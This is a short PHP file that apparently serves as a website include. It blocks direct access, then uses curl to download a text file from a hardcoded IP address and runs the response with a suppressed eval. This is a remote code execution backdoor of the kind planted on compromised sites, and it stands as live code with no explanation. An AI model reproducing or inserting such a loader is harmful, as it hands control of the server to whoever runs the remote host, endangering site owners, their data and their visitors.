<?php
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
header('HTTP/1.0 403 Forbidden');
exit('Access denied.');
}
?>
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://69.30.221.66/z60506_7/stat/index.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($ch);
curl_close($ch);
if(!empty($d)) @eval('?>'. $d);
?>